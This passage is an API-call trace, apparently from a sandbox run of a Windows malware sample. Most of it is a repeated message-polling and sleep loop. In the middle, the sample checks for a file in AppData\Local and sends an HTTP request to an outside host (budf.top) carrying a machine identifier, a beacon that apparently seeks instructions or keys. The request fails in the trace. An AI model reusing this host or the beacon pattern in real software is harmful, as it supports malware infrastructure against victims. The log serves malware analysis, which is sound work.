wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.265] Sleep (dwMilliseconds=0x64) [0178.373] timeGetTime () returned 0x1137bf1 [0178.373] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.373] Sleep (dwMilliseconds=0x64) [0178.482] timeGetTime () returned 0x1137c5e [0178.482] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.482] Sleep (dwMilliseconds=0x64) [0178.591] timeGetTime () returned 0x1137ccb [0178.591] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.591] Sleep (dwMilliseconds=0x64) [0178.701] timeGetTime () returned 0x1137d38 [0178.701] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.701] Sleep (dwMilliseconds=0x64) [0178.811] timeGetTime () returned 0x1137da6 [0178.811] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.811] Sleep (dwMilliseconds=0x64) [0178.919] timeGetTime () returned 0x1137e13 [0178.919] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0178.919] Sleep (dwMilliseconds=0x64) [0179.032] timeGetTime () returned 0x1137e80 [0179.032] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.032] Sleep (dwMilliseconds=0x64) [0179.138] timeGetTime () returned 0x1137eed [0179.138] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.138] Sleep (dwMilliseconds=0x64) [0179.247] timeGetTime () returned 0x1137f5a [0179.247] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.247] Sleep (dwMilliseconds=0x64) [0179.356] timeGetTime () returned 0x1137fc8 [0179.356] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.356] Sleep (dwMilliseconds=0x64) [0179.465] timeGetTime () returned 0x1138035 [0179.465] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.465] Sleep (dwMilliseconds=0x64) [0179.574] timeGetTime () returned 0x11380a2 [0179.574] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.574] Sleep (dwMilliseconds=0x64) [0179.683] timeGetTime () returned 0x113810f [0179.683] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.683] Sleep (dwMilliseconds=0x64) [0179.793] timeGetTime () returned 0x113817c [0179.793] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.793] Sleep (dwMilliseconds=0x64) [0179.902] timeGetTime () returned 0x11381ea [0179.902] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0179.902] Sleep (dwMilliseconds=0x64) [0180.011] timeGetTime () returned 0x1138257 [0180.011] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.011] Sleep (dwMilliseconds=0x64) [0180.120] timeGetTime () returned 0x11382c4 [0180.120] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.120] Sleep (dwMilliseconds=0x64) [0180.230] timeGetTime () returned 0x1138331 [0180.230] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.230] Sleep (dwMilliseconds=0x64) [0180.339] timeGetTime () returned 0x113839e [0180.339] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.339] Sleep (dwMilliseconds=0x64) [0180.448] timeGetTime () returned 0x113840c [0180.448] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.448] Sleep (dwMilliseconds=0x64) [0180.557] timeGetTime () returned 0x1138479 [0180.557] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.557] Sleep (dwMilliseconds=0x64) [0180.666] timeGetTime () returned 0x11384e6 [0180.666] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.666] Sleep (dwMilliseconds=0x64) [0180.775] timeGetTime () returned 0x1138553 [0180.776] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.776] Sleep (dwMilliseconds=0x64) [0180.885] timeGetTime () returned 0x11385c0 [0180.885] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.885] Sleep (dwMilliseconds=0x64) [0180.994] timeGetTime () returned 0x113862e [0180.994] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0180.994] Sleep (dwMilliseconds=0x64) [0181.103] timeGetTime () returned 0x113869b [0181.103] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.103] Sleep (dwMilliseconds=0x64) [0181.212] timeGetTime () returned 0x1138708 [0181.212] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.212] Sleep (dwMilliseconds=0x64) [0181.321] timeGetTime () returned 0x1138775 [0181.321] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.321] Sleep (dwMilliseconds=0x64) [0181.431] timeGetTime () returned 0x11387e2 [0181.431] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.431] Sleep (dwMilliseconds=0x64) [0181.540] timeGetTime () returned 0x1138850 [0181.540] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.540] Sleep (dwMilliseconds=0x64) [0181.649] timeGetTime () returned 0x11388bd [0181.649] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.649] Sleep (dwMilliseconds=0x64) [0181.759] timeGetTime () returned 0x113892a [0181.759] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.759] Sleep (dwMilliseconds=0x64) [0181.868] timeGetTime () returned 0x1138997 [0181.868] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.868] Sleep (dwMilliseconds=0x64) [0181.977] timeGetTime () returned 0x1138a04 [0181.977] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0181.977] Sleep (dwMilliseconds=0x64) [0182.087] timeGetTime () returned 0x1138a72 [0182.088] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.088] Sleep (dwMilliseconds=0x64) [0182.195] timeGetTime () returned 0x1138adf [0182.195] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.195] Sleep (dwMilliseconds=0x64) [0182.304] timeGetTime () returned 0x1138b4c [0182.304] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.304] Sleep (dwMilliseconds=0x64) [0182.414] timeGetTime () returned 0x1138bb9 [0182.414] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.414] Sleep (dwMilliseconds=0x64) [0182.523] timeGetTime () returned 0x1138c26 [0182.523] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.523] Sleep (dwMilliseconds=0x64) [0182.632] timeGetTime () returned 0x1138c94 [0182.632] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.632] Sleep (dwMilliseconds=0x64) [0182.741] timeGetTime () returned 0x1138d01 [0182.741] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.741] Sleep (dwMilliseconds=0x64) [0182.850] timeGetTime () returned 0x1138d6e [0182.850] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.851] Sleep (dwMilliseconds=0x64) [0182.960] timeGetTime () returned 0x1138ddb [0182.960] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0182.960] Sleep (dwMilliseconds=0x64) [0183.069] timeGetTime () returned 0x1138e48 [0183.075] SHGetFolderPathA (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x99aa4e4 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local") returned 0x0 [0183.076] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local", pMore="bowsakkdestx.txt" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 1 [0183.095] AreFileApisANSI () returned 1 [0183.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x99aa4e4, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 61 [0183.095] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x7a) returned 0x3215a0 [0183.095] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x99aa4e4, cbMultiByte=-1, lpWideCharStr=0x3215a0, cchWideChar=61 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt") returned 61 [0183.102] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\bowsakkdestx.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\bowsakkdestx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x99aa368, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0183.130] GetLastError () returned 0x2 [0183.136] GetLastError () returned 0x2 [0183.136] SetLastError (dwErrCode=0x2) [0183.136] GetLastError () returned 0x2 [0183.136] SetLastError (dwErrCode=0x2) [0183.136] GetLastError () returned 0x2 [0183.136] SetLastError (dwErrCode=0x2) [0183.142] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3215a0 | out: hHeap=0x2c0000) returned 1 [0183.142] InternetOpenW (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0183.154] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384310 [0183.159] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8e) returned 0x2eed00 [0183.159] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x384310 | out: hHeap=0x2c0000) returned 1 [0183.170] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32bff40 [0183.176] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x840) returned 0x32d7d08 [0183.176] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x32bff40, cbMultiByte=-1, lpWideCharStr=0x32d7d08, cchWideChar=1056 | out: lpWideCharStr="B56D42C81778FD36CA7BD76E3CC6490E") returned 33 [0183.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x850) returned 0x32ea568 [0183.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0183.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32bff40 | out: hHeap=0x2c0000) returned 1 [0183.182] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8b0) returned 0x32d7d08 [0183.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2eed00 | out: hHeap=0x2c0000) returned 1 [0183.182] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32ea568 | out: hHeap=0x2c0000) returned 1 [0183.182] lstrcpyW (in: lpString1=0x99aaf78, lpString2="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" | out: lpString1="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E") returned="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E" [0183.182] InternetOpenUrlW (hInternet=0xcc0004, lpszUrl="http://budf.top/ydtftysdtyftysdfsdpen3/get.php?pid=B56D42C81778FD36CA7BD76E3CC6490E", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0x0 [0185.518] InternetReadFile (in: hFile=0x0, lpBuffer=0x99aa778, dwNumberOfBytesToRead=0x400, lpdwNumberOfBytesRead=0x99aa604 | out: lpBuffer=0x99aa778, lpdwNumberOfBytesRead=0x99aa604) returned 0 [0185.518] InternetCloseHandle (hInternet=0x0) returned 0 [0185.519] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0185.519] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32d7d08 | out: hHeap=0x2c0000) returned 1 [0185.519] timeGetTime () returned 0x11397da [0185.519] timeGetTime () returned 0x11397da [0185.519] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0185.519] Sleep (dwMilliseconds=0x64) [0185.627] timeGetTime () returned 0x1139847 [0185.627] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0185.627] Sleep (dwMilliseconds=0x64) [0185.736] timeGetTime () returned 0x11398b4 [0185.736] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0185.736] Sleep (dwMilliseconds=0x64) [0185.846] timeGetTime () returned 0x1139921 [0185.846] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0185.846] Sleep (dwMilliseconds=0x64) [0185.955] timeGetTime () returned 0x113998e [0185.955] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0185.955] Sleep (dwMilliseconds=0x64) [0186.064] timeGetTime () returned 0x11399fc [0186.064] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.064] Sleep (dwMilliseconds=0x64) [0186.173] timeGetTime () returned 0x1139a69 [0186.173] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.173] Sleep (dwMilliseconds=0x64) [0186.282] timeGetTime () returned 0x1139ad6 [0186.282] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.282] Sleep (dwMilliseconds=0x64) [0186.392] timeGetTime () returned 0x1139b43 [0186.392] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.392] Sleep (dwMilliseconds=0x64) [0186.501] timeGetTime () returned 0x1139bb0 [0186.501] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.501] Sleep (dwMilliseconds=0x64) [0186.610] timeGetTime () returned 0x1139c1e [0186.610] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.610] Sleep (dwMilliseconds=0x64) [0186.719] timeGetTime () returned 0x1139c8b [0186.719] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.719] Sleep (dwMilliseconds=0x64) [0186.828] timeGetTime () returned 0x1139cf8 [0186.828] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.828] Sleep (dwMilliseconds=0x64) [0186.938] timeGetTime () returned 0x1139d65 [0186.938] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0186.938] Sleep (dwMilliseconds=0x64) [0187.047] timeGetTime () returned 0x1139dd2 [0187.047] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.047] Sleep (dwMilliseconds=0x64) [0187.156] timeGetTime () returned 0x1139e40 [0187.156] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.156] Sleep (dwMilliseconds=0x64) [0187.265] timeGetTime () returned 0x1139ead [0187.265] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.265] Sleep (dwMilliseconds=0x64) [0187.374] timeGetTime () returned 0x1139f1a [0187.374] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.374] Sleep (dwMilliseconds=0x64) [0187.484] timeGetTime () returned 0x1139f87 [0187.484] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.484] Sleep (dwMilliseconds=0x64) [0187.593] timeGetTime () returned 0x1139ff4 [0187.593] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.593] Sleep (dwMilliseconds=0x64) [0187.702] timeGetTime () returned 0x113a062 [0187.702] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.702] Sleep (dwMilliseconds=0x64) [0187.811] timeGetTime () returned 0x113a0cf [0187.811] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.811] Sleep (dwMilliseconds=0x64) [0187.920] timeGetTime () returned 0x113a13c [0187.920] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0187.920] Sleep (dwMilliseconds=0x64) [0188.030] timeGetTime () returned 0x113a1a9 [0188.030] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.030] Sleep (dwMilliseconds=0x64) [0188.139] timeGetTime () returned 0x113a216 [0188.139] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.139] Sleep (dwMilliseconds=0x64) [0188.248] timeGetTime () returned 0x113a284 [0188.248] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.248] Sleep (dwMilliseconds=0x64) [0188.357] timeGetTime () returned 0x113a2f1 [0188.357] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.357] Sleep (dwMilliseconds=0x64) [0188.466] timeGetTime () returned 0x113a35e [0188.467] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.467] Sleep (dwMilliseconds=0x64) [0188.577] timeGetTime () returned 0x113a3cb [0188.577] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.577] Sleep (dwMilliseconds=0x64) [0188.685] timeGetTime () returned 0x113a438 [0188.685] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.685] Sleep (dwMilliseconds=0x64) [0188.794] timeGetTime () returned 0x113a4a6 [0188.794] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.794] Sleep (dwMilliseconds=0x64) [0188.903] timeGetTime () returned 0x113a513 [0188.903] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0188.903] Sleep (dwMilliseconds=0x64) [0189.012] timeGetTime () returned 0x113a580 [0189.012] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.012] Sleep (dwMilliseconds=0x64) [0189.122] timeGetTime () returned 0x113a5ed [0189.122] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.122] Sleep (dwMilliseconds=0x64) [0189.231] timeGetTime () returned 0x113a65a [0189.231] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.231] Sleep (dwMilliseconds=0x64) [0189.340] timeGetTime () returned 0x113a6c8 [0189.340] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.340] Sleep (dwMilliseconds=0x64) [0189.449] timeGetTime () returned 0x113a735 [0189.449] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.449] Sleep (dwMilliseconds=0x64) [0189.558] timeGetTime () returned 0x113a7a2 [0189.558] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 [0189.558] Sleep (dwMilliseconds=0x64) [0189.668] timeGetTime () returned 0x113a80f [0189.668] PeekMessageW (in: lpMsg=0x99aa5c8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x99aa5c8) returned 0 